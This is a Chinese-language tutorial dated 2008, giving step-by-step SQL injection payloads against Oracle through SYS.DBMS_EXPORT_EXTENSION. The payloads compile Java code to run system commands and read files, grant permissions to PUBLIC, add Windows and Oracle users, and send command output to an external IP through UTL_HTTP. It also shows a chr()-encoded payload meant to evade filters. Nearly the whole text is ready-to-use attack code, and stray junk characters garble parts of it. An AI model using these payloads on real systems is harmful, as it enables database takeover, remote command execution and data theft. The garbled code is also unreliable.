以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成 0 t( U) g0 K3 _5 {
* }! d& h9 X0 Q- I /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
/ h/ Y, Y/ K! j6 B! r: K的形式即可。(用" 'a'|| "是为了让语句返回true值) 6 t6 b9 @; {3 l4 Q) m
语句有点长,可能要用post提交。
' |: W6 p" W6 v. [* O4 }" E以下是各个步骤: 6 j+ S8 r$ W" {6 _1 R; t0 v) d
1.创建包
: P0 p% A8 }+ n) D" F9 E4 B通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:) I) V, ?' H% m& r% h& z8 t
/xxx.jsp?id=1 and '1'<>'a'||( . [! s4 F: X7 Z1 g2 [! ^
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''; S, O9 l3 r% r9 g( T3 x
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
; }0 t. I- z3 | |) Jnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}* T: f. J6 R/ ~+ X; B" C
}'''';END;'';END;--','SYS',0,'1',0) from dual 7 X0 |4 q0 n) Z+ b" Q
) - y) ]8 |) w: g S, b- V
------------------------
, g" j. S- |' ~/ x4 u9 N8 G如果url有长度限制,可以把readFile()函数块去掉,即: 5 t0 X, @6 I+ U$ J8 g
/xxx.jsp?id=1 and '1'<>'a'||( ( g. M. M9 w6 t9 h# M v7 v
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
3 K& J0 r8 K# e) r' D4 acreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(, A4 k9 Y/ {& o: s. ]% \, U
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
* y4 A8 D7 O% J4 C) M}'''';END;'';END;--','SYS',0,'1',0) from dual ( g) j* d* C7 x9 Z
) q9 e1 G3 D! h5 J5 M
同时把后面步骤 提到的 对readFile()的处理语句去掉。
* \7 l9 Y" S5 B1 |5 X+ Q j" S------------------------------ & ~4 @& J1 Z. R
2.赋Java权限
! M" ]7 w( ~, B2 r8 g/ ^select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
# T2 v8 |) H* S& R; p3.创建函数 4 e# G% v/ e6 `9 D$ J$ o/ E: I
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''' `* r+ Y: P: y) I; ^" d+ |
create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual) K; l" P, C" o9 K+ _
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''" i! P. _) l/ `, u6 ^7 N% T
create or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''LinxUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual8 f" j% {* I* K K: L5 b
4.赋public执行函数的权限
) P3 {. M" V# a, P' _select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
" W0 Q" }# I0 H6 \select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
% ]3 o& Y% z+ F; [5 u [/ M: [9 O) q5.测试上面的几步是否成功
+ Q6 M8 N2 ^; `! u/ S `* jand '1'<>'11'||(
5 [$ D' v1 {: m2 R: X+ }! pselect OBJECT_ID from all_objects where object_name ='LINXRUNCMD'
$ P- Z- L+ @; R* g( K: d)
9 _' `. ]! I6 T0 qand '1'<>(
4 ~. E& I9 A; X R8 j% lselect OBJECT_ID from all_objects where object_name ='LINXREADFILE' " y* m+ T1 i: t! K5 [
)
2 m4 d7 | e8 t% [* Y& U6.执行命令:
. ?# d8 |: m3 K1 J* r2 b$ @/xxx.jsp?id=1 and '1'<>( 8 Y) p" H4 c8 H E! a, A& |
select sys.LinxRunCMD('cmd /c net user linx /add') from dual
) @/ k8 |0 k5 a( J$ y, U* p0 Q
8 ^6 t0 J1 b }0 V a) * s& l/ J' u' \9 v- |0 \
/xxx.jsp?id=1 and '1'<>( o8 S; _( O% q+ @6 C4 d1 [9 E
select sys.LinxReadFile('c:/boot.ini') from dual
7 y" ^; m% {2 a! y8 `/ o+ m- _+ S# B o6 z8 `( z+ U
)) ^& k! P$ @' c$ J
# A0 ~5 {! k! ~4 t9 A& U注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。 2 i. X3 q9 d- s
如果要查看运行结果可以用 union :
1 H, t8 H5 b& A# n, d- M/xxx.jsp?id=1 union select sys.LinxRunCMD('cmd /c net user linx /add') from dual; H* J8 l. V3 w% [6 x+ h5 d
或者UTL_HTTP.request(: - i& ~' t( @' a, }$ K
/xxx.jsp?id=1 and '1'<>( $ P+ K- t. i! a( D) ~) ]6 e! e
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual+ |3 Y6 \, X$ Z% J7 }
)
: G7 q) ~+ d. f! s/xxx.jsp?id=1 and '1'<>(
9 h& n; @/ e& L8 |$ u1 _( F7 HSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
8 _* X4 g5 w% ~" l)
" r) m3 X' S' @' ]' z6 l3 {) C$ q注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。- o0 u5 R4 A0 V. J
--------------------
* l- z8 O5 l* W4 m% f$ Y6.内部变化
, i4 o6 K/ T+ T通过以下命令可以查看all_objects表达改变:
: x0 R# | i( j/ W* ^. Lselect * from all_objects where object_name like '%LINX%' or object_name like '%Linx%'* `5 E& ~$ ~/ V" x4 W
7.删除我们创建的函数 0 C; X2 z% k- [+ n3 c: Z$ g. R, s$ R
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''$ n, O5 @5 o7 _! s. N
drop function LinxRunCMD '''';END;'';END;--','SYS',0,'1',0) from dual
& ]/ ^/ l) |6 k7 U& H==================================================== p2 Y8 A4 ]5 Q5 P' D
全文结束。谨以此文赠与我的朋友。 : n9 O. v, }( C7 X. B
linx 8 f% c& t+ h7 i; j- U
124829445
1 O; g+ l1 E& @2 _2008.1.12 ( ?, G; f! S0 o5 P* e
linyujian@bjfu.edu.cn
$ ^' r0 j6 \: i2 z: Y======================================================================
v0 }/ g7 J7 S测试漏洞的另一方法: 2 u1 k, Q' e* `- G
创建oracle帐号:
' n1 H" K9 l5 N- U! fselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''9 j/ z7 C7 H* |4 ~. Y" D! Q
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual& O: j7 c C1 \
即:
% Y0 w* I% U: tselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),! p( N9 m9 H0 e- N5 Z [: ?0 Y4 n
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
1 G" j' [' r- [( j确定漏洞存在: - D/ M' P8 W$ b8 ?1 q
1<>(
4 j* T4 N0 t) i9 h+ Y* K9 W& T! Eselect user_id from all_users where username='LINXSQL' , P, u+ b, q: S) x/ H6 o: \
) ( v$ x3 M8 P6 z1 G7 @. q8 T8 M
给linxsql连接权限:
8 ?" E8 F# h9 T* tselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''4 e! v& `/ @0 R# A2 ~5 m* M6 g
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual 5 l) F: V) M: B8 B$ f* y6 i
删除帐号: ! a. X" u( w+ _$ h0 o. h
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''7 U5 q+ P4 A5 K+ n- c4 x3 |# ~
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual ' ?# y9 n5 O7 j. r' W
====================== % p8 }& R: _5 O. U' `
以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:$ H0 `! K$ S3 R' z1 h$ f
1.jsp?id=1 and '1'<>( A+ S: `/ @0 }
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
; r2 k) o# k+ Z; H+ lcreate or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1; end; '''';END;'';END;--','SYS',0,'1',0) from dual( i9 \, x1 Z, G( g4 ?
) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE; d/ O3 K) z8 c! v
)# s3 q8 _9 V+ i3 Y! f+ D! X
9 |; W# I" k2 L% b1 o+ r. G
! @- I. l8 q: y0 w# M2 e2 _* u6 R- Z$ g; k. H
|